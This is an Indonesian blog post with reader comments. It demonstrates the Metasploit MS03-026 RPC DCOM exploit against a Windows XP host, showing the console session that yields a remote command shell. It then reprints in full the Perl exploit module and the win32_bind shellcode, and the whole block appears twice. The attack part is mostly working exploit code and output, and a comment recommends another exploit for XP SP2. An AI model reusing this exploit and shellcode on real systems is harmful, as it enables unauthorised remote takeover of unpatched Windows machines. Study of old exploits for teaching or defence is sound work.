Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>cd
cd
C:>exit
exit
[*] Exiting Bind Handler.
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 177
RPORT -> 177
msf msrpc_dcom_ms03_026(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
——– —— ————– ——————
required RHOST 172.16.0.5 The target address
required RPORT 177 The target port
Payload: Name Default Description
——– ——– ——- ——————————————
required EXITFUNC thread Exit technique: “process”, “thread”, “seh”
required LPORT 4444 Listening port for bind shell
Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Exiting Bind Handler.
terlihat disitu bahwa saat port diganti dengan port lain, semisal
port 177 maka exploitasi tidak berhasil.
dari hasil analisa saya bahwa exploitasi dgn rpcdcom itu menggunakan port
135 yang merupakan hole dari microsoft winxp sp1.
saat port nya diganti dengan port lain artinya port itu tidak sesuai
dengan port yang akan digunakan oleh exploit msrpc_dcom_ms03_026
sehingga tidak berhasil di exploitasi.
bisa dilihat informasi ttg msrpc_dcom_ms03_026:
*lihat lah port yang digunakan
msf > info msrpc_dcom_ms03_026
Name: Microsoft RPC DCOM MSO3-026
Class: remote
Version: $Rev: 3818 $
Target OS: win32, win2000, winnt, winxp, win2003
Keywords: dcom
Privileged: Yes
Disclosure: Jul 16 2003
Provided By:
H D Moore
spoonm
Brian Caswell
Available Targets:
Windows NT SP3-6a/2K/XP/2K3 English ALL
Available Options:
Exploit: Name Default Description
——– —— ——- ——————
required RHOST The target address
required RPORT 135 The target port
Payload Information:
Space: 880
Avoid: 7 characters
| Keys: noconn tunnel bind ws2ord reverse
Nop Information:
SaveRegs: esp ebp
| Keys:
Encoder Information:
| Keys:
Description:
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has been widely exploited ever since. This
module can exploit the English versions of Windows NT 4.0 SP3-6a,
Windows 2000, Windows XP, and Windows 2003 all in one request 🙂
References:
http://www.osvdb.org/2100
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.milw0rm.com/metasploit/42
terlihat bahwa port yang akan digunakan oleh exploit itu adalah port 135.
dari informasih terebut juga terdapat informasi yang menunjukkan bahwa
exploit ini bisa langsung jump ke priveledge admin.
see at above : Privileged: Yes,
dimana exploit tersebut mengexploitasi a stack overflow pada the RPCSS
service, dan dapat exploit the English versions dari
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003.
see at the description.
CMIIW 🙂
*untuk permasalahan/pembahasan mengenai stack overflow, RPCSS service
bisa dicari di google.
kalo tidak salah om Cyb3rh3b pernah menulis ttg stack overflow.
—tambahan :
bagi yang suka menganalisa “code”, berikut saya berikan kode program
dari msrpc_dcom_ms03_026 dan win32_bind yang saya ambil dari tool
metasploit v2.7
*Silahkan disimak dan dicermati dgn baik ;p
msf > cat msrpc_dcom_ms03_026.pm
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::msrpc_dcom_ms03_026;
use strict;
use base “Msf::Exploit”;
use Pex::DCERPC;
use Pex::NDR;
use Pex::Text;
use Pex::x86;
my $advanced = {
‘FragSize’ => [ 256, ‘The DCERPC fragment size’ ],
‘BindEvasion’ => [ 0, ‘IDS Evasion of the Bind request’ ],
};
my $info = {
‘Name’ => ‘Microsoft RPC DCOM MSO3-026’,
‘Version’ => ‘$Rev: 3818 $’,
‘Authors’ => [
‘H D Moore ‘,
‘spoonm ‘,
‘Brian Caswell ‘
],
‘Arch’ => [‘x86’],
‘OS’ => [ ‘win32’, ‘win2000’, ‘winnt’, ‘winxp’, ‘win2003’ ],
‘Priv’ => 1,
‘AutoOpts’ => { ‘EXITFUNC’ => ‘thread’ },
‘UserOpts’ => {
‘RHOST’ => [ 1, ‘ADDR’, ‘The target address’ ],
‘RPORT’ => [ 1, ‘PORT’, ‘The target port’, 135 ],
},
‘Payload’ => {
‘Space’ => 880,
‘BadChars’ => “x00x0ax0dx5cx5fx2fx2e”,
‘Keys’ => [‘+ws2ord’],
},
‘Description’ => Pex::Text::Freeform(
qq{
This module exploits a stack overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has been
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request 🙂
}
),
‘Refs’ => [ [ ‘OSVDB’, ‘2100’ ], [ ‘MSB’, ‘MS03-026’ ], [ ‘MIL’, ’42’ ], ],
‘DefaultTarget’ => 0,
‘Targets’ => [
[
‘Windows NT SP3-6a/2K/XP/2K3 English ALL’,
0x77f33723, # Windows NT 4.0 SP6a (esp)
0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
0x0018759f, # Windows 2000 Universal (ebx)
0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
0x001b0b0b
, # Windows 2003 call near [ebp+0x30] (unicode.nls – thanks Litchfield!)
0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
],
],
‘Keys’ => [‘dcom’],
‘DisclosureDate’ => ‘Jul 16 2003’,
};
sub new {
my $class = shift;
my $self =
$class->SUPER::new( { ‘Info’ => $info, ‘Advanced’ => $advanced }, @_ );
return ($self);
}
sub Build {
my ($self) = @_;
my $target_idx = $self->GetVar(‘TARGET’);
my $shellcode = $self->GetVar(‘EncodedPayload’)->Payload;
my $target = $self->Targets->[$target_idx];
if ( !$self->InitNops(128) ) {
$self->PrintLine(“[*] Failed to initialize the nop module.”);
return;
}
##
# The following was inspired by Dino Dai Zovi’s description of his exploit
##
# 360 is a magic number for cross-OS exploitation 🙂
my $xpseh = Pex::Text::EnglishText(360);
# Jump to [esp-4] – (distance to shellcode)
my $jmpsc = “x8bx44x24xfc” . # mov eax,[esp-0x4]
“x05xe0xfaxffxff” . # add eax,0xfffffae0 (sub eax, 1312)
“xffxe0”; # jmp eax
# Jump to [ebp+0x30] – (distance to shellcode) – thanks again Litchfield!
my $jmpsc2k3 = “x8bx45x30” . # mov eax,[ebp+0x30]
“x05x24xfbxffxff” . # add eax,0xfffffb24 (sub 1244)
“xffxe0”; # jmp eax
# Windows 2003 added by spoonm
substr( $xpseh, 246 – length($jmpsc2k3), length($jmpsc2k3), $jmpsc2k3 );
substr( $xpseh, 246, 2,
Pex::x86::JmpShort( ‘$+’ . ( -1 * length($jmpsc2k3) ) ) );
substr( $xpseh, 250, 4, pack( ‘V’, $target->[5] ) );
substr( $xpseh, 306, 2, “xebx06” );
substr( $xpseh, 310, 4, pack( ‘V’, $target->[4] ) );
substr( $xpseh, 314, length($jmpsc), $jmpsc );
##
# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
# HD wrote NT 4.0 SP6a, and it’s off in a different place
#
# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
# (hopefully I’m accurate, this is from my memory…)
#
# |—pop pop ret——– –eax—|
# V | | V
# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
# 4 4 4 5 5
# | ^
# ————————————————–|
# The jmpback’s all are 5 byte backwards jumps into our shellcode that
# sits just below these overwrites…
##
my $nt4sp3jmp =
Pex::x86::JmpShort( ‘$+’ . ( 12 + 5 ) )
. Pex::Text::RandomChars( 2, $self->PayloadBadChars );
my $nt4sp5jmpback = “xe9” . pack( ‘V’, -( 5 + 4 + length($shellcode) ) );
my $nt4sp3jmpback =
“xe9” . pack( ‘V’, -( 12 + 5 + 5 + length($shellcode) ) );
my $ntshiz = $nt4sp3jmp
. pack( ‘V’, $target->[7] )
. pack( ‘V’, $target->[6] )
. $nt4sp5jmpback
. $nt4sp3jmpback;
# Pad to the magic value of 118 bytes
$ntshiz .=
Pex::Text::RandomChars( 118 – length($ntshiz), $self->PayloadBadChars );
# Create the evil UNC path used in the overflow
my $uncpath =
“x5cx00x5cx00”
. $self->MakeNops(32)
. “xebx10xebx19”
. # When attacking NT 4.0, jump over 2000/XP return
pack( “V”, $target->[3] ) . # Return address for 2000 (ebx)
pack( “V”, $target->[1] ) . # Return address for NT 4.0 (esi)
pack( “V”, $target->[2] ) . # Writable address on 2000 and jmp for NT 4.0
$self->MakeNops(88)
. “xebx04xffxffxffxff”
. $self->MakeNops(8)
. “xebx04xebx04”
. $self->MakeNops(4)
. “xebx04xffxffxffxff”
. $shellcode
. $ntshiz
. $xpseh
. “x5cx00x41x00x00x00x00x00x00x00”;
# This is the rpc cruft needed to trigger the vuln API
my $stub =
Pex::NDR::Short(5)
. Pex::NDR::Short(1)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::Text::RandomData(16)
. # UUID
Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::UnicodeConformantVaryingStringPreBuilt($uncpath)
.
Pex::NDR::Long(0)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) );
return $stub;
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar(‘RHOST’);
my $target_port = $self->GetVar(‘RPORT’);
my $uuid = ‘4d9f4ab8-7d1c-11cf-861e-0020af6e7c57’;
my $version = ‘0.0’;
my $handle =
Pex::DCERPC::build_handle( $uuid, $version, ‘ncacn_ip_tcp’, $target_host,
$target_port );
my $dce = Pex::DCERPC->new(
‘handle’ => $handle,
‘fragsize’ => $self->GetVar(‘FragSize’),
‘bindevasion’ => $self->GetVar(‘BindEvasion’),
);
if ( !$dce ) {
$self->PrintLine(“[*] Could not bind to $handle”);
return;
}
my $stub = $self->Build();
if ( !$stub ) {
$self->PrintLine(‘[*] unable to create request’);
}
$self->PrintLine(‘[*] Sending request…’);
my @response = $dce->request( $handle, 0, $stub );
if (@response) {
$self->PrintLine(‘[*] RPC server responded with:’);
foreach my $line (@response) {
$self->PrintLine( ‘[*] ‘ . $line );
}
$self->PrintLine(‘[*] This probably means that the system is patched’);
}
return;
}
msf > cat win32_bind.pm
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Payload::win32_bind;
use strict;
use base ‘Msf::PayloadComponent::Windows::Payload’;
my $info =
{
‘Name’ => ‘Windows Bind Shell’,
‘Version’ => ‘$Revision: 2067 $’,
‘Description’ => ‘Listen for connection and spawn a shell’,
‘Authors’ => [ ‘vlad902 ‘, ],
‘Arch’ => [ ‘x86’ ],
‘Priv’ => 0,
‘OS’ => [ ‘win32’ ],
‘Size’ => ”,
‘Payload’ =>
{
Offsets =>
{
‘LPORT’ => [ 162, ‘n’ ],
‘EXITFUNC’ => [ 308, ‘V’ ]
},
Payload =>
“xfcx6axebx4dxe8xf9xffxffxffx60x8bx6c”.
“x24x24x8bx45x3cx8bx7cx05x78x01xefx8b”.
“x4fx18x8bx5fx20x01xebx49x8bx34x8bx01”.
“xeex31xc0x99xacx84xc0x74x07xc1xcax0d”.
“x01xc2xebxf4x3bx54x24x28x75xe5x8bx5f”.
“x24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb”.
“x03x2cx8bx89x6cx24x1cx61xc3x31xdbx64”.
“x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40”.
“x08x5ex68x8ex4ex0execx50xffxd6x66x53”.
“x66x68x33x32x68x77x73x32x5fx54xffxd0”.
“x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66”.
“x81xedx08x02x55x6ax02xffxd0x68xd9x09”.
“xf5xadx57xffxd6x53x53x53x53x53x43x53”.
“x43x53xffxd0x66x68x11x5cx66x53x89xe1”.
“x95x68xa4x1ax70xc7x57xffxd6x6ax10x51”.
“x55xffxd0x68xa4xadx2exe9x57xffxd6x53”.
“x55xffxd0x68xe5x49x86x49x57xffxd6x50”.
“x54x54x55xffxd0x93x68xe7x79xc6x79x57”.
“xffxd6x55xffxd0x66x6ax64x66x68x63x6d”.
“x89xe5x6ax50x59x29xccx89xe7x6ax44x89”.
“xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93”.
“x8dx7ax38xabxabxabx68x72xfexb3x16xff”.
“x75x44xffxd6x5bx57x52x51x51x51x6ax01”.
“x51x51x55x51xffxd0x68xadxd9x05xcex53”.
“xffxd6x6axffxffx37xffxd0x8bx57xfcx83”.
“xc4x64xffxd6x52xffxd0x68x7exd8xe2x73”.
“x53xffxd6xffxd0”,
},
};
sub _Load
{
Msf::PayloadComponent::Windows::Payload->_Import(‘Msf::PayloadComponent::BindConnection
‘);
}
sub new
{
my $class = shift;
my $hash = @_ ? shift : { };
my $self;
_Load();
$hash = $class->MergeHashRec($hash, {‘Info’ => $info});
$self = $class->SUPER::new($hash, @_);
return($self);
}
1;
—== Salam hangat, ===—
fl3xu5
[*] Starting the Metasploit Framework…
| | _) |
__ `__ _ __| _` | __| __ | _ | __|
| | | __/ | ( |__ | | | ( | | |
_| _| _|___|__|__,_|____/ .__/ _|___/ _|__|
_|
+ — –=[ msfconsole v2.7 [157 exploits – 76 payloads]
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 172.16.0.5
RHOST -> 172.16.0.5
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Got connection from 172.16.0.3:3766 172.16.0.5:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>cd
cd
C:>exit
exit
[*] Exiting Bind Handler.
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 177
RPORT -> 177
msf msrpc_dcom_ms03_026(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
——– —— ————– ——————
required RHOST 172.16.0.5 The target address
required RPORT 177 The target port
Payload: Name Default Description
——– ——– ——- ——————————————
required EXITFUNC thread Exit technique: “process”, “thread”, “seh”
required LPORT 4444 Listening port for bind shell
Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Sending request…
[*] Exiting Bind Handler.
terlihat disitu bahwa saat port diganti dengan port lain, semisal
port 177 maka exploitasi tidak berhasil.
dari hasil analisa saya bahwa exploitasi dgn rpcdcom itu menggunakan port
135 yang merupakan hole dari microsoft winxp sp1.
saat port nya diganti dengan port lain artinya port itu tidak sesuai
dengan port yang akan digunakan oleh exploit msrpc_dcom_ms03_026
sehingga tidak berhasil di exploitasi.
bisa dilihat informasi ttg msrpc_dcom_ms03_026:
*lihat lah port yang digunakan
msf > info msrpc_dcom_ms03_026
Name: Microsoft RPC DCOM MSO3-026
Class: remote
Version: $Rev: 3818 $
Target OS: win32, win2000, winnt, winxp, win2003
Keywords: dcom
Privileged: Yes
Disclosure: Jul 16 2003
Provided By:
H D Moore
spoonm
Brian Caswell
Available Targets:
Windows NT SP3-6a/2K/XP/2K3 English ALL
Available Options:
Exploit: Name Default Description
——– —— ——- ——————
required RHOST The target address
required RPORT 135 The target port
Payload Information:
Space: 880
Avoid: 7 characters
| Keys: noconn tunnel bind ws2ord reverse
Nop Information:
SaveRegs: esp ebp
| Keys:
Encoder Information:
| Keys:
Description:
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has been widely exploited ever since. This
module can exploit the English versions of Windows NT 4.0 SP3-6a,
Windows 2000, Windows XP, and Windows 2003 all in one request 🙂
References:
http://www.osvdb.org/2100
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
http://www.milw0rm.com/metasploit/42
terlihat bahwa port yang akan digunakan oleh exploit itu adalah port 135.
dari informasih terebut juga terdapat informasi yang menunjukkan bahwa
exploit ini bisa langsung jump ke priveledge admin.
see at above : Privileged: Yes,
dimana exploit tersebut mengexploitasi a stack overflow pada the RPCSS
service, dan dapat exploit the English versions dari
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003.
see at the description.
CMIIW 🙂
*untuk permasalahan/pembahasan mengenai stack overflow, RPCSS service
bisa dicari di google.
kalo tidak salah om Cyb3rh3b pernah menulis ttg stack overflow.
—tambahan :
bagi yang suka menganalisa “code”, berikut saya berikan kode program
dari msrpc_dcom_ms03_026 dan win32_bind yang saya ambil dari tool
metasploit v2.7
*Silahkan disimak dan dicermati dgn baik ;p
msf > cat msrpc_dcom_ms03_026.pm
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::msrpc_dcom_ms03_026;
use strict;
use base “Msf::Exploit”;
use Pex::DCERPC;
use Pex::NDR;
use Pex::Text;
use Pex::x86;
my $advanced = {
‘FragSize’ => [ 256, ‘The DCERPC fragment size’ ],
‘BindEvasion’ => [ 0, ‘IDS Evasion of the Bind request’ ],
};
my $info = {
‘Name’ => ‘Microsoft RPC DCOM MSO3-026’,
‘Version’ => ‘$Rev: 3818 $’,
‘Authors’ => [
‘H D Moore ‘,
‘spoonm ‘,
‘Brian Caswell ‘
],
‘Arch’ => [‘x86’],
‘OS’ => [ ‘win32’, ‘win2000’, ‘winnt’, ‘winxp’, ‘win2003’ ],
‘Priv’ => 1,
‘AutoOpts’ => { ‘EXITFUNC’ => ‘thread’ },
‘UserOpts’ => {
‘RHOST’ => [ 1, ‘ADDR’, ‘The target address’ ],
‘RPORT’ => [ 1, ‘PORT’, ‘The target port’, 135 ],
},
‘Payload’ => {
‘Space’ => 880,
‘BadChars’ => “x00x0ax0dx5cx5fx2fx2e”,
‘Keys’ => [‘+ws2ord’],
},
‘Description’ => Pex::Text::Freeform(
qq{
This module exploits a stack overflow in the RPCSS service, this vulnerability
was originally found by the Last Stage of Delirium research group and has been
widely exploited ever since. This module can exploit the English versions of
Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request 🙂
}
),
‘Refs’ => [ [ ‘OSVDB’, ‘2100’ ], [ ‘MSB’, ‘MS03-026’ ], [ ‘MIL’, ’42’ ], ],
‘DefaultTarget’ => 0,
‘Targets’ => [
[
‘Windows NT SP3-6a/2K/XP/2K3 English ALL’,
0x77f33723, # Windows NT 4.0 SP6a (esp)
0x7ffde0eb, # Windows 2000 writable address + jmp+0xe0
0x0018759f, # Windows 2000 Universal (ebx)
0x01001c59, # Windows XP SP0/SP1 (pop pop ret)
0x001b0b0b
, # Windows 2003 call near [ebp+0x30] (unicode.nls – thanks Litchfield!)
0x776a240d, # Windows NT 4.0 SP5 (eax) ws2help.dll
0x74ff16f3, # Windows NT 4.0 SP3/4 (pop pop ret) rnr20.dll
],
],
‘Keys’ => [‘dcom’],
‘DisclosureDate’ => ‘Jul 16 2003’,
};
sub new {
my $class = shift;
my $self =
$class->SUPER::new( { ‘Info’ => $info, ‘Advanced’ => $advanced }, @_ );
return ($self);
}
sub Build {
my ($self) = @_;
my $target_idx = $self->GetVar(‘TARGET’);
my $shellcode = $self->GetVar(‘EncodedPayload’)->Payload;
my $target = $self->Targets->[$target_idx];
if ( !$self->InitNops(128) ) {
$self->PrintLine(“[*] Failed to initialize the nop module.”);
return;
}
##
# The following was inspired by Dino Dai Zovi’s description of his exploit
##
# 360 is a magic number for cross-OS exploitation 🙂
my $xpseh = Pex::Text::EnglishText(360);
# Jump to [esp-4] – (distance to shellcode)
my $jmpsc = “x8bx44x24xfc” . # mov eax,[esp-0x4]
“x05xe0xfaxffxff” . # add eax,0xfffffae0 (sub eax, 1312)
“xffxe0”; # jmp eax
# Jump to [ebp+0x30] – (distance to shellcode) – thanks again Litchfield!
my $jmpsc2k3 = “x8bx45x30” . # mov eax,[ebp+0x30]
“x05x24xfbxffxff” . # add eax,0xfffffb24 (sub 1244)
“xffxe0”; # jmp eax
# Windows 2003 added by spoonm
substr( $xpseh, 246 – length($jmpsc2k3), length($jmpsc2k3), $jmpsc2k3 );
substr( $xpseh, 246, 2,
Pex::x86::JmpShort( ‘$+’ . ( -1 * length($jmpsc2k3) ) ) );
substr( $xpseh, 250, 4, pack( ‘V’, $target->[5] ) );
substr( $xpseh, 306, 2, “xebx06” );
substr( $xpseh, 310, 4, pack( ‘V’, $target->[4] ) );
substr( $xpseh, 314, length($jmpsc), $jmpsc );
##
# NT 4.0 SP3/SP4 work the same, just use a pop/pop/ret that works on both
# NT 4.0 SP5 is a jmp eax to avoid a conflict with SP3/SP4
# HD wrote NT 4.0 SP6a, and it’s off in a different place
#
# Our NT 4.0 SP3/SP4/SP5 overwrites will look something like this:
# (hopefully I’m accurate, this is from my memory…)
#
# |—pop pop ret——– –eax—|
# V | | V
# [ jmp +17 ] [ ret sp3/4 ] [ ret sp5 ] [ jmpback sp5 ] [ jmpback sp3/4 ]
# 4 4 4 5 5
# | ^
# ————————————————–|
# The jmpback’s all are 5 byte backwards jumps into our shellcode that
# sits just below these overwrites…
##
my $nt4sp3jmp =
Pex::x86::JmpShort( ‘$+’ . ( 12 + 5 ) )
. Pex::Text::RandomChars( 2, $self->PayloadBadChars );
my $nt4sp5jmpback = “xe9” . pack( ‘V’, -( 5 + 4 + length($shellcode) ) );
my $nt4sp3jmpback =
“xe9” . pack( ‘V’, -( 12 + 5 + 5 + length($shellcode) ) );
my $ntshiz = $nt4sp3jmp
. pack( ‘V’, $target->[7] )
. pack( ‘V’, $target->[6] )
. $nt4sp5jmpback
. $nt4sp3jmpback;
# Pad to the magic value of 118 bytes
$ntshiz .=
Pex::Text::RandomChars( 118 – length($ntshiz), $self->PayloadBadChars );
# Create the evil UNC path used in the overflow
my $uncpath =
“x5cx00x5cx00”
. $self->MakeNops(32)
. “xebx10xebx19”
. # When attacking NT 4.0, jump over 2000/XP return
pack( “V”, $target->[3] ) . # Return address for 2000 (ebx)
pack( “V”, $target->[1] ) . # Return address for NT 4.0 (esi)
pack( “V”, $target->[2] ) . # Writable address on 2000 and jmp for NT 4.0
$self->MakeNops(88)
. “xebx04xffxffxffxff”
. $self->MakeNops(8)
. “xebx04xebx04”
. $self->MakeNops(4)
. “xebx04xffxffxffxff”
. $shellcode
. $ntshiz
. $xpseh
. “x5cx00x41x00x00x00x00x00x00x00”;
# This is the rpc cruft needed to trigger the vuln API
my $stub =
Pex::NDR::Short(5)
. Pex::NDR::Short(1)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::Text::RandomData(16)
. # UUID
Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long(0)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::UnicodeConformantVaryingStringPreBuilt($uncpath)
.
Pex::NDR::Long(0)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) )
. Pex::NDR::Long(1)
. Pex::NDR::Long(1)
. Pex::NDR::Long( int( rand(0xFFFFFFFF) ) );
return $stub;
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar(‘RHOST’);
my $target_port = $self->GetVar(‘RPORT’);
my $uuid = ‘4d9f4ab8-7d1c-11cf-861e-0020af6e7c57’;
my $version = ‘0.0’;
my $handle =
Pex::DCERPC::build_handle( $uuid, $version, ‘ncacn_ip_tcp’, $target_host,
$target_port );
my $dce = Pex::DCERPC->new(
‘handle’ => $handle,
‘fragsize’ => $self->GetVar(‘FragSize’),
‘bindevasion’ => $self->GetVar(‘BindEvasion’),
);
if ( !$dce ) {
$self->PrintLine(“[*] Could not bind to $handle”);
return;
}
my $stub = $self->Build();
if ( !$stub ) {
$self->PrintLine(‘[*] unable to create request’);
}
$self->PrintLine(‘[*] Sending request…’);
my @response = $dce->request( $handle, 0, $stub );
if (@response) {
$self->PrintLine(‘[*] RPC server responded with:’);
foreach my $line (@response) {
$self->PrintLine( ‘[*] ‘ . $line );
}
$self->PrintLine(‘[*] This probably means that the system is patched’);
}
return;
}
msf > cat win32_bind.pm
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Payload::win32_bind;
use strict;
use base ‘Msf::PayloadComponent::Windows::Payload’;
my $info =
{
‘Name’ => ‘Windows Bind Shell’,
‘Version’ => ‘$Revision: 2067 $’,
‘Description’ => ‘Listen for connection and spawn a shell’,
‘Authors’ => [ ‘vlad902 ‘, ],
‘Arch’ => [ ‘x86’ ],
‘Priv’ => 0,
‘OS’ => [ ‘win32’ ],
‘Size’ => ”,
‘Payload’ =>
{
Offsets =>
{
‘LPORT’ => [ 162, ‘n’ ],
‘EXITFUNC’ => [ 308, ‘V’ ]
},
Payload =>
“xfcx6axebx4dxe8xf9xffxffxffx60x8bx6c”.
“x24x24x8bx45x3cx8bx7cx05x78x01xefx8b”.
“x4fx18x8bx5fx20x01xebx49x8bx34x8bx01”.
“xeex31xc0x99xacx84xc0x74x07xc1xcax0d”.
“x01xc2xebxf4x3bx54x24x28x75xe5x8bx5f”.
“x24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb”.
“x03x2cx8bx89x6cx24x1cx61xc3x31xdbx64”.
“x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40”.
“x08x5ex68x8ex4ex0execx50xffxd6x66x53”.
“x66x68x33x32x68x77x73x32x5fx54xffxd0”.
“x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66”.
“x81xedx08x02x55x6ax02xffxd0x68xd9x09”.
“xf5xadx57xffxd6x53x53x53x53x53x43x53”.
“x43x53xffxd0x66x68x11x5cx66x53x89xe1”.
“x95x68xa4x1ax70xc7x57xffxd6x6ax10x51”.
“x55xffxd0x68xa4xadx2exe9x57xffxd6x53”.
“x55xffxd0x68xe5x49x86x49x57xffxd6x50”.
“x54x54x55xffxd0x93x68xe7x79xc6x79x57”.
“xffxd6x55xffxd0x66x6ax64x66x68x63x6d”.
“x89xe5x6ax50x59x29xccx89xe7x6ax44x89”.
“xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93”.
“x8dx7ax38xabxabxabx68x72xfexb3x16xff”.
“x75x44xffxd6x5bx57x52x51x51x51x6ax01”.
“x51x51x55x51xffxd0x68xadxd9x05xcex53”.
“xffxd6x6axffxffx37xffxd0x8bx57xfcx83”.
“xc4x64xffxd6x52xffxd0x68x7exd8xe2x73”.
“x53xffxd6xffxd0”,
},
};
sub _Load
{
Msf::PayloadComponent::Windows::Payload->_Import(‘Msf::PayloadComponent::BindConnection
‘);
}
sub new
{
my $class = shift;
my $hash = @_ ? shift : { };
my $self;
_Load();
$hash = $class->MergeHashRec($hash, {‘Info’ => $info});
$self = $class->SUPER::new($hash, @_);
return($self);
}
1;
—== Salam hangat, ===—
fl3xu5
wah… bang primadonal ada disini jg ya.. 🙂
klo pake win 2000 gmn?? eh met idul pitri
@han : sama om.
yup met idul fitri juga 🙂
wew,,, panjang amatt,, cape bacanya,, 😀
kalo buat lagi lebih dibikin simple y,,, btw, nice.,, ^^
@scratchz : wew terimakasih sarannya om 🙂
btw ini sengaja di perdetail biar agak jelas 🙂
Artikel yang menarik sekali bro…bikin lebih care aja sama security di windows..sekalian mo coba eksplorasi lebih jauh Metasploitnya….Keep on Writing bro…. 🙂
@irving : thx bro..silahkan saja explore bro, tar share ke saya ya 🙂
Wah keren bgt mas pembahasannya lengkap….BTW aku coba di laptopku pake win XP SP2 kok gak bisa ya mas, padahal standar tuh baru install…bajakan lagi :p belum ada patch sama sekali….gimana mas flexus yah…
mohon pencerahannya…….
thanx a lot atas sharenya……:)
pada umumnya windows XPSP2 memang tidak bisa.
kemaren sempet coba exploit xpsp2 yang belom dipatch.. pake peercast_url_win32 dan berhasil.
silahkan di coba lagi ..:)
ini info dari peercast_url_win32 :
om mw nanya nih.. koq pas mw map network drive.. koq dia minta user sama password.. apa harus bikin user tamu dulu?
ya pastikan lah user dengan group administrators sudah di create untuk masuk ke network drive nya.
